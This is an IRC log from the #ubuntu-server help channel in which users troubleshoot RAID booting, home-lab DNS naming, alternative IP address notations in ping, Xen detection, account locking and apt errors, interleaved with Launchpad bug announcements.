<Psi-Jack> Your LDAP setup will depend on what you use for an LDAP server. Personally, I'd recommend you use OpenDJ for an LDAP server since it has a lot of power behind it, and it can even keep your passwords automatically synchronized between samba's unique format, and passwd accounts.
<uvirtbot> New bug: #761463 in quota (main) "edquota crashes when used with libnss-db" [Undecided,Confirmed] https://launchpad.net/bugs/761463
<uvirtbot> New bug: #1048342 in samba (main) "Cannot share folder" [Undecided,New] https://launchpad.net/bugs/1048342
<orated> Hello! I've completed Ubuntu 12.04 server
<orated> installation, I'd like to know how can I change it to Ubuntu desktop. Will ubuntu-desktop and X packages help?
<uvirtbot> New bug: #1048344 in rrdtool (main) "rrdcached installaion fails due to segfault running initscript" [Undecided,New] https://launchpad.net/bugs/1048344
<orated> I know Ubuntu server does not have a GUI by default. I just would like to know if installed *-desktop package can give gui or is there anything else to do. I completed ubuntu-desktop package installation but I still see tty7 blank and booting to tty1
<patdk-lap> nope, that is all
<orated> patdk-lap: Its not working for me
<tim-ct> hi all. I have set up my first set of iptables on 12.04. Please can someone look at to see if i have not screwed them up http://pastebin.com/UGUqH9DE
<patdk-lap> I dunno what, not working for me, means
<patdk-lap> atleast I have never heard of that error message before
<orated> patdk-lap: I completed ubuntu-desktop package installation but I still see tty7 blank and booting to tty1
<Troy^> hmm trying to test the upload speed on my ubuntu server but i have nothing to test it with outside network
<mp_> hi all
<mp_> is it possible to install the kvm host on a usb drive while the guest oses are installed on the hdd raid?
<patdk-lap> sure, even possible to have it installed for pxe boot :)
<mp_> will i have performance problems with such a setup?
<uvirtbot> New bug: #1047427 in mysql-5.5 (main) "package mysql-server-5.5 5.5.24-0ubuntu0.12.04.1 failed to install/upgrade: subprocess installed post-installation script returned error exit status 1" [High,Invalid] https://launchpad.net/bugs/1047427
<LinuxAdmin> hi guys, I'm getting problems with Ubuntu Server 12.04 installation
<LinuxAdmin> I can install everything without problems, but after update the system I cannot boot
<LinuxAdmin> grub cannot recognize my disks
<LinuxAdmin> I'm already reading some articles I think will solve the issue but I'm wondering why such a thing happens on a server flavor
<LinuxAdmin> have someone experienced this before?
<ikonia> define doesn't recognise disks, where does it not see the, what's the error ?
<LinuxAdmin> when the system boots it goes to grub rescue command line
<LinuxAdmin> I foot to say that I have raid configured
<LinuxAdmin> my boot disk should be md0
<Troy^> hmm probablly configure it wrong? this is a fresh install right?
<ikonia> software raid, hardware raid, fakeraid ?
<Troy^> mdadm i assume
<ikonia> well, it's easy to let him answer
<Troy^> lol right
<LinuxAdmin> right Troy, the system installs correctly, I restart it after the installation and everything goes fine, but after some updates the system do not boot anymore
<ikonia> software raid, hardware raid, fakeraid ?
<LinuxAdmin> mdadm, yes Troy
<ikonia> are you using an mdadm.conf ?
<Troy^> so your at the grub rescue?
<LinuxAdmin> I suppose mdadm uses it by default
<ikonia> no, it doesn't
<LinuxAdmin> I have not watch it yet
<Troy^> type ls in grub rescue does your md0 come up?
<LinuxAdmin> I installed ubuntu server before, with software raid and it used mdadm.conf, that's why I'm supposing it is configured by default
<xnox> if there is no mdadm.conf, update-initramfs -u will create one in the initramfs
<LinuxAdmin> I'm reading an article that advice editing mdadm.conf, do you think this can solve the problem?
<LinuxAdmin> I'm considering editing mdadm.conf with a live cd and then restart the server
<Troy^> http://paste.ubuntu.com/1195363/ this is what mine looks like 2x hard drives (Raid 1)
<Troy^> I don't really know much but i know mine works lol, i can see the two drives in the array
<LinuxAdmin> as I said I already installed an ubuntu server 10.04 with software raid and it has an mdadm.conf with the corresponding partitions configured
<LinuxAdmin> it is pretty much the same of yours
<Troy^> 10.04?
<LinuxAdmin> I will check with a live cd what it looks like, if the raid is configured or if something was touched with updates
<Troy^> LinuxAdmin: did you do a dist-upgrade?
<LinuxAdmin> Troy, this happened on a 11.04
<Troy^> a dist-upgrade might definietly break something like that
<LinuxAdmin> no Try, I installed it from a cd, after the installation I restart the system and everything was fine, but after some automatic updates, the system could not boot any more
<Troy^> hmm ok
<LinuxAdmin> I'm talking about 10.4 because I installed a 10.04 before with software raid and it created automatically mdadm.conf file
<Troy^> oh ok
<LinuxAdmin> Troy, o you think if I edit mdadm.conf with a live cd and configure the correct partitions and raid arrays, should it boots normally?
<Troy^> i would also check your grub config too
<LinuxAdmin> ok
<Troy^> make sure it's boot from the right partition
<LinuxAdmin> ok it's what I'll check tomorrow
<LinuxAdmin> thanks for the advice
<Yippy_Tor> new to linux/ubuntu server here: sorry if this is a stupid question:  When I start a process on then command line...How do I get it to drop back to command line and not stay in the running process?
<Kentos> interesting, if i configure a hardware Raid, and have two configurations, they will show up in ubuntu as two sperate HDD's correct? but they will be of the hardware configuration
<patdk-lap> yep
<Kentos> that is the better option to go with correct?
<patdk-lap> heh?
<patdk-lap> you didin't give options, how can I compare?
<Kentos> as opposed to leaving them unconfigured as scsi drives and installing them via a software raid through ubuntu installation
<patdk-lap> that all depends on your plans
<patdk-lap> do you want to make use of the raid card features and benifits?
<Kentos> Have no idea what those are
<patdk-lap> do you perfer to do it yourself? or use mdadm instead? for better compatability if you need to change a failed raid card
<Kentos> I want whatever is going to produce the least issues, but more importantly be configurable to set up online data storage
<Kentos> im fairly sure if i go with the hardware it will simplify the installation and drive acess as it will be considered one HDD for each array
<Kentos> essentially
<Kentos> however the RAID setup for hardware Im not entirely familiar with, logical drives etc. it seems like its a bit more of a task wtih nothing here to really help me aka like a manual for the raid cards
<uvirtbot> New bug: #1048406 in dhcp3 (main) "package dhcp3-server 3.1.3-2ubuntu3.3 failed to install/upgrade: there is no script in the new version of the package - giving up" [Undecided,New] https://launchpad.net/bugs/1048406
#ubuntu-server 2013-09-02
<sirajperson> hey all
<sirajperson> I have been google'n crazy to try and get VT100 to work right from the vga of my server install
<sirajperson> I have an script that I want to use shades of colors to display information, but cannot get the monitor to use a VT100 terminal
<sirajperson> anyone have any idea how to get VT100 without installing X?
<stlu> Hi Again
<stlu> Re my DNS project: I have left the home router out of the picture, because I really don't know whats under the hood, and it doesnt allow user-configuration of its DNS service.
<stlu> So heres what I have:
<stlu> domain is "myroom"
<stlu> I have a desktop unit "dell.myroom"
<stlu> 3 laptops which I have now separated into 3 VLANs
<stlu> ...instead of 1.
<stlu> dns.vbox1.myroom ubuntu1.vbox1.myroom
<stlu> dns.vbox2.myroom ubuntu2.vbox1.myroom
<stlu> dns.vbox3.myroom ubuntu1.vbox3.myroom
<stlu> And they are bridged networking.
<stlu> Question: should I make records in "dell.myroom" for "vbox_.myroom" pointing down to "dns.vbox_.myroom"?
<stlu> ...oh, the virtual DNSs are also routers/gateways for the vlan
<stlu> so for vbox2 it would have a WAN of 172.24.100.202 <-- dns.vbox2.myroom --> 192.168.102.1 (the VLAN)
<stlu> Therefore, I am thinking I should add to dell.myroom's DNS database: vbox1 as 172.24.100.201, vbox2 as 172.24.100.202, vbox3 as 172.24.100.203
<stlu> ...And that's with my intention to let them share record information.
<stlu> ... to clarify the question: is the 4th DNS server nessesary for the transfer of records?
<yolanda> jamespage, zul : https://code.launchpad.net/~yolanda.robla/cinder/autopkgtests/+merge/183394
<jamespage> yolanda, merged - thanks!
<yolanda> np
<jamespage> zul, adam_g: https://code.launchpad.net/~james-page/horizon/refresh-static-assets-fix-type/+merge/183400
<zul> jamespage:  North America is on vacation today but I +1ed the horizon merge
<jamespage> zul, ta
<jamespage> zul, thanks
<Katafalkas> hey, why locale is broken on  every image i try ?  i start a fresh ubuntu1204 64bit image on amazon - on apt-get upgrade - locale is broken. I do exactly the same on DigitalOcean - again. fresh image - locale is broken.
<stlu> hey, sorry to repeat myself - if DNS servers want to exchange records, do they need the IP  of each other, the URL, either, or both?
<stlu> And, am I doint
<stlu> am I thinking the wrong way if I feel the need to have another DNS server to help the other DNS servers to find each other by URL?
<stlu> *
<andol> stlu: Not sure I fully understand the question, but assuming we are talking about zonetransfers I'd say the most common scenarion is them knowing each others ip addresses
<stlu> andol: ok thanks.  So then, through 3 different VLANs, all I have to do is make sure routing is set up, and each DNS server will just need the IP of the other two.
<stlu> right?
<stlu> I keep getting tripped up thinking that the heirarchy of URLs must be strictly followed by the DNS server.
<stlu> but like, technically, this means I could have each DNS server with a master database for one other VLAN, or even have a tossup where each DNS server has records for any random set of IPS...
<stlu> Ok then, so if the VLAN has a domain vbox3.myroom, and addresses x.vbox3.myroom, what conventionally does one do with that URL?  should it point to something or nothing?
<andol> stlu: Well, exactly what info is needed where might depend of what dns server you are running, and in what way you want the update chain to happen
<andol> stlu: Unless you have any other preferenses, just take a look at BIND, and some of the examples in its configuration, and see whatever works for you.
<stlu> andol: I have 3 VLANs side-by-side, under a LAN.  I don't care how they transfer information, I just want to learn the conventions.
<stlu> but I want one DNS for each VLAN, since the VLAN is inside virtualBox on a laptop, and not all 3 laptops will be on all the tim.
<stlu> *time
<RoyK> why not one or two common DNS servers?
 * RoyK works at a college with 20+ VLANs and two DNS servers
<stlu> I may not be using 'VLAN' as it is supposed to be used, but what I have is a couple VMs running under virtualbox, in a laptop.
<RoyK> you should be able to route between them nevertheless
<stlu> If I do a common DNS server, it would have to be on hardware that is on all the time...
<RoyK> or run dns server on your laptop :P
<stlu> RoyK: and when that laptop is  off, the other two laptops will have no DNS!
<RoyK> stlu: just trying to be a bit practical here :)
<RoyK> stlu: do you have an official domain? if so, the isp should give dns as a service free of charge
<RoyK> or whoever sold you the domain
<stlu> no, I'm extremely minimalistic here, my domain is .myroom, and  the laptops are in my room.
<stlu> there is home ISP service, but it isn't relevant for my learning project - I don't even know if the home modem/router would share its DNS information for the wifi lan.
<RoyK> stlu: hm... can you afford a raspberry pi?
<stlu> RoyK: yes, I could.
<RoyK> that'd be a neat "dedicated server" ;)
<stlu> That's a great idea.  Then it would be on 24/7, and any of the VMs could reach it, regardless of the other laptops being on/off.
<RoyK> stlu: mhm - doesn't cost much either
<stlu> to the next question: what would be the convention if I had pc1.vbox3.myroom, pc2.vbox3.myroom, pc3.vbox3.myroom, all together, but I tried to connect to vbox3.myroom itself, what should that point to?
<RoyK> what do you mean"point to"?
<RoyK> the easiest would be to run virtualbox in bridged mode and put them all on the same IP network
<stlu> could be many things, say I open a web browser, or "ping" it, or email stlu@vbox3.myroom, or ssh, or whatever.
<RoyK> stlu: are you using rfc1918 addresses on your laptop?
<RoyK> stlu: just run ifconfig to check
<stlu> rfc1918?
<RoyK> just pastebin ifconfig output
<stlu> umm, I'll explain again the network diagram:
<RoyK> http://en.wikipedia.org/wiki/RFC1918#Private_IPv4_address_spaces
<stlu> ah yes, absolutely
<RoyK> and all clients on the same IP network?
<stlu> all laptops are on the 192.168.2.0/24 network for my wireless home internet.
<RoyK> then they should be able to ping oneanother without issues
<RoyK> same applies to any VMs on those
<stlu> each laptop has a virtualbox internal-only network 192.168.{101,102,103}.0/24 and pc1 is the gateway.
<RoyK> if you're not using bridged mode networking, the VMs won't be reachable
<RoyK> ic
<RoyK> better make the pi the gateway when you get it
<RoyK> eh
<RoyK> no
<RoyK> sorry
<stlu> but the DNS server doesn't necessarily *have to* have a record for the domain vbox3.myroom, but I could make it anything or nothing.  what is the convention?
<stlu> Sorry I can't seem to phrase this question in a way that makes it obviously simple as it is.
<stlu> I have *no* issues with pinging the systems, I just wonder about the convention for the over-riding domain that all the VMs are part of.
<stlu> pc1.vbox3.myroom = VM PC#1
<stlu> pc2.vbox3.myroom = VM PC #2
<stlu> pc3.vbox3.myroom = VM PC#3
<stlu> all the VMs now have a URL
<stlu> My question is, this remains:
<stlu> vbox3.myroom = ???
<stlu> ...
<stlu> and I realized I'd better change the pc numbering to avoid confusion...
<stlu> pc1.vbox1.myroom, pc2.vbox1.myroom, pc3.vbox.myroom
<stlu> pc4.vbox2.myroom, pc5.vbox2.myroom, pc6.vbox2.myroom
<stlu> pc7.vbox3.myroom, pc8.vbox3.myroom, pc9.vbox3.myroom
<stlu> there.
<stlu> I have several ideas, but I don't know which is most conventional/correct.
<stlu> I could make that domain point to the gateway pc, on it's "wan" interface, so a web brower, a ping, or an ssh connection would go to that pc
<stlu> or I could just pick one of the VMs as a web server and set it to that, say pc8.vbox3.myroom = www.vbox3.myroom = vbox3.myroom
<stlu> or I could point it to the laptop itself, but that seems to have little use, since the laptop's OS isn't supposed to be part of the project.
<stlu> RoyK?
<stlu> do you have any of your 20 VLANs with similar subdomains?
<RoyK> stlu: back
<RoyK> stlu: no, we don't mix network structure and dns
<RoyK> not that it should be a problem
<stlu> ok, so to pick on zkxs, for example, I see that his URL is ip68-14-174-230.ok.ok.cox.net
<stlu> so there doesn't have to be any relationship between those subdomains, this is what you're saying?
<stlu> Well then, it seems that some of the subdomains don't matter: http://pastebin.com/8G26bcvp
<stlu> RoyK: so this is an example of proper conventions?  If it isn't related to network structure, what might they have been thinking when they made the subdomains ok, and ok.ok ?
<stlu> Hmm, If I were in charge of that DNS, I'd want to change it to something more informative, like *.customers.cox.net
<stlu> I just looked at my own URL, bas16-toronto12-1088897118.dsl.bell.ca
<stlu> At least that makes a bit more sense.
<stlu> I think that "dsl." is just a way to separate the customer records from other systems, like their routers and office machines and stuff.
<shauno> ok.ok.cox.net may be a very poor example; that could easily be $city.$state.cox.net, and Oklahoma City, OK has thrown you off
<stlu> frick, I'll bet you're right!
<stlu> dangit, zkxs, why'd you have to live in Oklahoma, confusing my noob brain?
 * stlu that IP is in Oklahoma
<shauno> actually, I might be wrong, I see a friend in san diego has sd.sd.cox.net.  there goes my logic
<stlu> ok, well maybe they have other gear there, like x.routers.ok.cox.net?
<stlu> ok.ok is like "general.ok"
<stlu> or "customers.ok"
<stlu> so then, in conclusion, if my subdomains "vbox1", "vbox2" and "vbox3" just help me to remember which laptop (equiv. to the city/state idea) the VM resides, then it would be perfectly acceptable to leave no DNS record for them.
<shauno> name hierarchies can have as much or little meaning as you like.  eg, we have a bunch of machines that are server.foo.corp.com because their dns is handled by a load-balancer, so we can just delegate foo.corp.com
<shauno> on the other hand, www.corp.com and mail.corp.com don't need to be on the same subnet, planet, etc, despite being at the same level
<stlu> I'm having fun pinging all over the place.
<stlu> www.ok.cox.net actually points to something, while ok.cox.net is nothing.
<stlu> and cox.net is the same IP as for www.cox.net, which make a bit of sense.
<stlu> mail.cox.net is nothing.
<stlu> www.ok.ok.cox.net is also nothing
<RoyK> stlu: I don't there are much naming convensions - that is - I'd say there are about as many convensions as there are sysadmins
<stlu> thank you RoyK.  I can say that knowing there aren't any conventions is probably just as important as knowing when there are conventions.
<RoyK> stlu: there are always convensions, and always arguments between sysadmins etc about which is the best ;)
<stlu> you know what I mean :P
<stlu> There isn't a hard and fast rule that everyone is all trying to reach for... they have a few, and reasons to use whichever one they like best.
<stlu> because no sysadmin who still has a job would decide to say, assign a dotted-trio IP address to his systems, because he has a good argument for it!  "I think 55.44.33 is  a much better way to address the database server!"
<stlu> ... omg... apparently 55.44.33 is translated into 55.44.0.33... why oh why??? I just wanted to pick something impossible...
<stlu> WTF? $ ping 64.2316494
<stlu> PING 64.2316494 (64.35.88.206) 56(84) bytes of data.
<stlu> I'm going to beat my forehead upon the nearest durable wooden surface... brb
<stlu> $ ping 642316494
<stlu> PING 642316494 (38.72.248.206) 56(84) bytes of data.
<Patrickdk_> heh? I name my servers 4digit numbers
<Patrickdk_> have to patch syslog-ng to even allow that
<Patrickdk_> it keeps thinking my server name is a date
<stlu> Patrickdk: I pity the poor soul that has to take over your job after you retire...
<Patrickdk_> me?
<Patrickdk_> the numbers make perfect sense :)
<Patrickdk_> better than naming them all after greek gods or something
<yolanda> zul, jamespage https://code.launchpad.net/~yolanda.robla/neutron/autopkgtests/+merge/183451
<stlu> Finally: $ ping 2648F8CE
<stlu> ping: unknown host 2648F8CE
<stlu> Patrickdk: Oh, i though you meant you gave your servers some perverted IP address like 12.34 with only four digits.
<baswazz_> i have set 'hdparm -y /dev/sd[b-g] for almost 24 hours works fine, but when i remove the '# spindown_time = 60' in /etc/hdparm.conf nothing happens no spindown. And i did a reboot.
<stlu> I guess a nuumeric hostname isn't such a bad thing.
<stlu> Of course, it has to make me wrong again, 12.34 is translated to 12.0.0.34....
<Patrickdk_> makes it simple, 8001, 8002, 8003, would be 3 web servers :)
<Patrickdk_> bet you can't think of the email servers name
<stlu> 2501, 2502, 2503?
<stlu> And FTP servers at 2101, 2102, 2103...?
<Patrickdk_> well, try to stick to sftp
<RoyK> stlu: root@francesco:~# ping 0x2648F8CE
<RoyK> PING 0x2648F8CE (38.72.248.206) 56(84) bytes of data.
<stlu> FUUUUUUUUUUUUUUUUUUUUUUUUUUU
<sgran> machines with both smtp and ssh are 4701, 4702 ?
<sgran> stlu: what's the problem?
<Patrickdk_> sgran, no, wouldn't combine servers like that, too much security risk
<stlu> RoyK: you didn't seriously do that just now.
<RoyK> stlu: just had to try to ping a hex address ;)
<sgran> it's just a number :)
<RoyK> sgran: an ip address is just a 32bit unsigned number too ;)
<sgran> that's what I mean
<RoyK> :)
<sgran> try 'ping 0'
<sgran> these are valid, if thankfully uncommon, ways to express IP addresses
<stlu> PING 0 (127.0.0.1) 56(84) bytes of data
<stlu>  O.O
<RoyK> :)
<sgran> also ping 2130706433
<sgran> steve@gashuffer:~$ echo $(( (74 << 24 ) + (125 << 16) + (136 << 8) + 113 ))
<sgran> 1249740913
<sgran> steve@gashuffer:~$ ping 1249740913
<sgran> PING 1249740913 (74.125.136.113) 56(84) bytes of data.
<highvoltage> heh, strange how chromium turns that in to 'localhost' and not '127.0.0.1'
<stlu> $ ping 0x1000000111001110100000001011110
<stlu> that doesnt work
<RoyK> stlu: that's a rather large number :P
<RoyK> 0x => hex
<stlu> oh
<stlu> I wanted to make it interpret as binary
<RoyK> don't think you can do binary directly from the shell
<baswazz_> anyone who can help me out?
<sgran> my telepathy is not working
<sgran> perhaps with more detail, I could answer that
<RoyK> well http://www.linuxtopia.org/online_books/advanced_bash_scripting_guide/numerical-constants.html
<RoyK> stlu: ping $((2#1000000111001110100000001011110))
<stlu> RoyK: PING 1088897118 (64.231.64.94) 56(84) bytes of data.
<stlu> mind=blown
<stlu> is the double parantheses needed because its a bash arithmetic expression?
<stlu> *are the
<sgran> yes
<sgran> $(( )) is integer arithmetic
<sgran> 2#1000000111001110100000001011110 is an input to that that returns 1088897118
<stlu> I'm learning sh syntax and my mentor gets pissed every time I learn a new 'bash-ism' as he calls it.
<stlu> But he's old-school and I'm not.
<sgran> $(( )) is POSIX
<stlu> ahah! So I can flaunt my arithmetic in my old-school mentor's face!
<stlu> Anyway, for some reason I cannot email myself at adam@1604548979
<stlu> gmail doesn't waaaaaant it.
<mardraum> well, it's not a valid email address.
<mardraum> or are you still being cute?
<stlu> I'm noob.  No time for cute.
<mardraum> then read about DNS and particularly MX records
<stlu> but if thats not valid, how come sending email to adam@95.163.121.115 is?
<mardraum> (if you care about smtp and not arithmetic)
<RoyK> sgran: sure it's posix? it works with bash/zfs, but not with dash/tcsh
<sgran> steve@gashuffer:~$ dash
<sgran> $ echo $(( (74 << 24 ) + (125 << 16) + (136 << 8) + 113 ))
<sgran> 1249740913
<mardraum> email to bare IPs, never guaranteed to work no matter how you got to the IP
<RoyK> sgran: # echo $((2#01000100101))
<RoyK> dash: 1: arithmetic expression: expecting EOF: "2#01000100101"
<sgran> stlu: a valid smtp hostname is not the same thing as a valid IP
<stlu> mardraum: ok then, I had a false notion.  I tried again and it came back bad.
<sgran> RoyK: oh, yes 2# is a bash extension
 * stlu feels slightly offended being called 'cute'
<Patrickdk_> you troll
<jamespage> smb, any good with seccomp?
<jamespage> bug 1219857
<uvirtbot> Launchpad bug 1219857 in vsftpd "vsftpd connections fail on amd64: "500 OOPS: child died"" [Undecided,New] https://launchpad.net/bugs/1219857
<smb> jamespage, hm not very good...
<smb> jamespage, is there more hints or maybe some apparmour log
<jamespage> smb, other than:
<jamespage> Sep  2 14:25:51 vsftpd-debug kernel: [   15.517149] type=1326 audit(1378131951.002:12): auid=4294967295 uid=65534 gid=65534 ses=4294967295 pid=1402 comm="vsftpd" sig=31 syscall=96 compat=0 ip=0x7fffacf79dff code=0x0
<smb> jamespage, I would probably try my luck in #security but not sure how many US/CA folks are around
<baswazz_> can anyone assist me with hdparm /etc/hdparm.conf is not working
<baswazz_> when i use hdparm -y the drives go in sleep
<baswazz_> but when i set it up in hdparm.conf nothing happen even after a reboot
<cocoa117> i am running ubuntu 12.10 server on Xen platform, how can I tell if that is right? i got uname -a
<cocoa117> Linux ABCD 3.5.0-17-generic #28-Ubuntu SMP Tue Oct 9 19:31:23 UTC 2012 x86_64 x86_64 x86_64 GNU/Linux
<Patrickdk_> virtwhat
<cocoa117> Patrickdk_, ?
<Patrickdk_> heh?
<Patrickdk_> you asked a question, I gave you an answer, and you ? me?
<Patrickdk_> hmm, actually, maybe that isn't in ubuntu
<cocoa117> Patrickdk_, not sure what you mean by virtwhat
<Patrickdk_> oh, virt-what, in ubuntu
<cocoa117> Patrickdk_, command not found
<Patrickdk_> install it
<Patrickdk_> always helps
<cocoa117> oh, ok, i try
<cocoa117> Patrickdk_, got it, Xen, many thanx
<cocoa117> should the ubuntu 12.10 server have empty folder in /proc/xen?
<cocoa117> i want to figure out if i am running xen-domu or xen-hvm
<cocoa117> this applogic thing is hard to figure things out
<Patrickdk_> don't look in /proc/ use /sys
<cocoa117> Patrickdk_, does the independent_wallclock still exist in 12.10 xen pv domU?
<RoyK> cocoa117: is this a vm you got from somewhere?
<cocoa117> RoyK, yes, this is a VM
<RoyK> cocoa117: from an isp etc?
<cocoa117> that's right
<cocoa117> RoyK, in fact, i am pretty sure it is a Xen domU
<cocoa117> it just didn't show the normal info off it, and i can't solve the time issue
<RoyK> cocoa117: I haven't seen virt-what miss yet
<cocoa117> xen as the answer
<RoyK> cocoa117: then what are you trying to sort out?
<Patrickdk_> it's impossible to make the clock stable
<Patrickdk_> it won't happen
<Patrickdk_> independent wallclock just makes it a mess, unless the host has LOTS of free cpu cycles
 * RoyK mutters something about NTP
<Patrickdk_> ntp will help with independent wallclock, but still, you need enough cpu cycles, or it will giveup
#ubuntu-server 2013-09-03
<lanc3r> Does this channel support Xbuntu LAMP servers?
<lanc3r> It's all the same Terminal, right? the only diffrence is the GUI
<bradm> lanc3r: servers generally don't run X
<bradm> lanc3r: but there's no difference to the server side of things
<lanc3r> Well, what's the biggie useing the GUI just to navigate to the terminal? how would you stop X and just run the command line?
<bradm> why would it even be installed if its a server?
<bradm> or do you mean you're using a desktop to do server related tasks?
<lanc3r> It came with X, how do you downlad it without the gui?
<lanc3r> yes'sir.
<bradm> you'd download the server install cds if you just want a server
<bradm> but regardless, all the server related stuff is the same if you use the desktop install or the server install, its all the same packages
<lanc3r> Oh, I feel dumb.. I just installed the desktop version and put the extra tools I needed on there.
<bradm> those tools will be the same
<bradm> but in general, I wouldn't want X on a server, unless you had a specific reason for it
<lanc3r> I'm still a bit new to Linux servers, It's pointless cause I just go straight to the terminal.
<bradm> thats fine, everyone was new once :)
<bradm> your situation might be different, but when someone says server, I think of a machine sitting in the corner somewhere, without anyone directly logged into it physically, and doing the admin via ssh
<bradm> in general you only want running on a server what you need to provide the service, but situations are different for different people
<lanc3r> I've got the packages for useing SSH but not sure how to implement them.
<qman__> apt-get isntall openssh-server
<lanc3r> Uh, duh. i said i have them.
<qman__> that's it
<qman__> you can now SSH into your server
<mgw> Is it possible to access the functions in a bash script without executing other top level code?
<mgw> I think notâ¦ but hoping someone has some ideas.
<qman__> I don't understand what you're asking
<bradm> mgw: other than refactoring the bash script to have the functions in another file that you source, no, I'm not aware of anything
<qman__> right, the way to share code in a shell script is to move that code to a separate script and source it
<mgw> bradm: that's what I thoughtâ¦ it's a 3rd party script that I'd rather not refactor, but I guess I have no choice
<mgw> But maybe somebody has a better idea for what i'm trying to do. I want to wrap the lxc-ubuntu LXC template and perform some additional package installation and configuration.
<rdw200169> are there any known bugs with software raid in the ubuntu installer for 13.04?
<rdw200169> i keep getting a segfault during install while trying to setup a software raid... tested with mdadm in the installer shell and creating the raid isn't the problem
<rdw200169> dangit, it's mkfs.xfs
<rdw200169> Aw... it wasn't xfs... (even tho mkfs.xfs failed after install on a new software raid array)
<rdw200169> gah, any mkfs fails on the assembled raid *sad*
<bin__> how can i update linux kernel using apt-get?
<bin__> am running lucid, but do not want to do a full release upgrade
<cocoa117> bin__, apt-get dist-upgrade
<zetheroo> where are the vnet interfaces defined and/or configured?
<jpds> zetheroo: libvirt?
<zetheroo> I was hoping for a config file or something
<jpds> zetheroo: It's generated, when the machine boots.
<zetheroo> is there any way to generate it without rebooting the host?
<jpds> zetheroo: No.
<zetheroo> all the other hosts have vnet interfaces on their bridge ... but one host has only eth0 and eth1
<jpds> zetheroo: http://wiki.libvirt.org/page/Networking
<zetheroo> just rebooted the host - still not a single vnet interface
<msafi> I have "KiB Mem: 603840 total, 497856 used, 105984 free." Why is that even though I have nothing running on my server?
<Gargoyle> Hi guys, I am trying to put firewall rules into /etc/network/if-pre-up.d/001.sh and 002.sh. I've given them root ownership and execute, but after a reboot the rules are not applied. (script work fine if I manually run them as root)
<msafi> Also, when I look under %MEM, I don't see any single process that's using much memory...
<Gargoyle> msafi: Buffers!
<Gargoyle> Free RAM = wasted RAM.
<msafi> Gargoyle, how come? Free ram -- in my mind -- means RAM available to be used...
<Gargoyle> msafi: buffers = RAM available to be used (but while you're not using it, the kernel is going to use it to make stuff faster)
<msafi> I see.
<msafi> Well, Gargoyle, my buffers is at 4536. What unit of measure is this number?
<Gargoyle> msafi: http://www.redhat.com/advice/tips/meminfo.html
<msafi> Gargoyle, Thanks!
 * ogra_ recommend "sudo apt-get install htop" to msafi 
<ogra_> *recommends
<msafi> ogra_, what does it do?
<ogra_> that displays memory usage more enduser friendly
<msafi> ogra_, cool. Will try it!
<ogra_> its like top, but computes the MEM usage for actually used RAM
<Gargoyle> Anyone got any thoughts on my if-pre-up.d? Have I missed something?
<Gargoyle> Oooh. htop is nice! :D
<msafi> ogra_, hey htop looks good!
<ogra_> :)
<Gargoyle> Oh wowâ¦ Seems I've stumbled into a 2009 "pre-up" argumentâ¦ wonder what the outcome was...
<Gargoyle> Seems that NetworkManager took overâ¦ but I don't have that on a 10.04 server?
<adac> How to remove a password of an user so he cannot login anymore?
<just-a-visitor> adac: passwd -l username maybe.
<ogra_> adac, sudo passwd -l <user>
<Pici> That won't prevent them from using key authentication to ssh in.
<adac> Pici, what can prevent this as well?
<Pici> adac: You'd need to set an expiry date on the account as well, by using usermod -e 1 <username>
<adac> Pici, I see! thanks!
<Katafalkas> hey, anyone could give me a resource on parted disk label types ? or could briefly explain em to me ? "bsd", "gpt", "loop", "mac", "mips", "msdos", "pc98" or "sun"
<zul> jamespage:  we need a new package for keystone
<jamespage> zul, what
<jamespage> ?
<zul> dogpile.cache https://pypi.python.org/pypi/dogpile.cache
<zul> welcome back mr freaking kotter
<rbasak> Katafalkas: what are you trying to do? On a normal Intel server machine you probably want msdos, or gpt if you have >3G disks.
<rbasak> (or a UEFI-only system)
<jamespage> zul, gah - you better offer an archive admin beer next time you see them then!
<zul> jamespage:  i tried offering myself but that didnt go over too well
<jamespage> lol
<Katafalkas> rbasak: I am making partition for database server. I am using parted. parted gives an error unrecognised disk label when I am trying to make ext4. I need to make label first. What albel should I use. I assume the gpt is the right one here.
<baswazz_> how do i add hdparm to the Ubuntu "init" upstart system
<just-a-visitor> Katafalkas: http://ubuntuforums.org/showthread.php?t=1457901 seems to be on topic, albeit dated.
<Katafalkas> just-a-visitor: cheers <3
<DammitJim> ok, I just installed 12.04.3 LTS server 64 bit on a VMware VM
<DammitJim> only package I picked was openssh
<DammitJim> then I did an sudo apt-get update && sudo apt-get upgrade
<DammitJim> then when I tried install ubuntu-desktop
<DammitJim> the system is telling me: "Size mismatch"
<DammitJim> anybody?
<RoyK> somebody!
<DammitJim> sorry.... somebody!
<RoyK> ;)
<RoyK> DammitJim: grammatically correct, sir
<RoyK> huh - size mismatch?
<DammitJim> yeah, it's the weirdest thing
<DammitJim> I didn't have this problem when I tested it at home
<RoyK> DammitJim: try an apt-get dist-upgrade first
<DammitJim> but here in the office it's spilling that
<DammitJim> I did... came out with no problems
<DammitJim> meaning... no upgrades
<DammitJim> could it be a network problem?
<DammitJim> I'm downloading a package at a time and see if that makes any difference
<DammitJim> this is ridiculous
<DammitJim> there is someone on askubuntu.com that said it was a problem with his firewall??
<jcastro> that's a network/mirror problem
<jcastro> or proxy
<DammitJim> no proxy here
<DammitJim> OK, I finally got it to install
<DammitJim> but I installed a bunch of lib packages manually
<DammitJim> I hope there isn't an underlying problem for this production server
<jcastro> a size mismatch is a problem with the mirror or the server getting to the mirror
<jcastro> doing a sudo apt-get clean and sudo apt-get update can clear that up
<DammitJim> oh ok, but if I installed the stuff and I got no errors, then it probably means it installed lxde properly, right?
<jcastro> yes
<DammitJim> ok, I'm cleaning just in case
<DammitJim> I think that clears the apt cache, right?
<jcastro> yeah
<DammitJim> ok, now to exim4 config
<DammitJim> anyone know what options I need to pick to only allow exim4 to deliver mail to 1 single domain?
<rbasak> mdeslaur: have you seen bug 1215282?
<uvirtbot> Launchpad bug 1215282 in puppet "Possible puppet performance regression with 2.7.11-1ubuntu2.4" [Undecided,New] https://launchpad.net/bugs/1215282
<mdeslaur> rbasak: no, I had not, thanks
<rbasak> mdeslaur: np. I'm not really sure what to do with that bug.
<mdeslaur> hrm, me either...we just use the patches upstream provides us
<marcel__> hello
<marcel__> can I ask a question about pxeserver
<RoyK> !ask | marcel__
<ubottu> marcel__: Please don't ask to ask a question, simply ask the question (all on ONE line and in the channel, so that others can read and follow it easily). If anyone knows the answer they will most likely reply. :-) See also !patience
<marcel__> Is it possible to make a pxeserver that supports win64 and win32 environments in the same pxeserver.cfg?
<RoyK> marcel__: do you still have 32bit hardware to be tanked with windows?
<marcel__> I have 32bit and 64 bit hardware
